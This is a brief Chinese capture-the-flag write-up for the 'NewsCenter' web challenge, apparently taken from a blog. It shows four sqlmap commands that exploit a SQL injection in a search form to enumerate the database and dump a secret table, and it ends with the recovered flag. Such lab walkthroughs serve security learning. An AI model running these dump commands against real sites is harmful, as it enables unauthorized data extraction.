攻防世界-WEB-NewsCenter

打开环境

攻防世界-WEB-NewsCenter_第1张图片

有查询,猜测是sql注入

攻防世界-WEB-NewsCenter_第2张图片

保存请求头到文件中

攻防世界-WEB-NewsCenter_第3张图片

准备利用sqlmap

查找数据库

python sqlmap.py -r ./123.txt --dbs

攻防世界-WEB-NewsCenter_第4张图片

查找表

python sqlmap.py -r ./123.txt --tables -D news

攻防世界-WEB-NewsCenter_第5张图片

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

攻防世界-WEB-NewsCenter_第6张图片

显示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

攻防世界-WEB-NewsCenter_第7张图片

得到flag

QCTF{sq1_inJec7ion_ezzz

你可能感兴趣的:(CTF练习册,数据库,改行学it)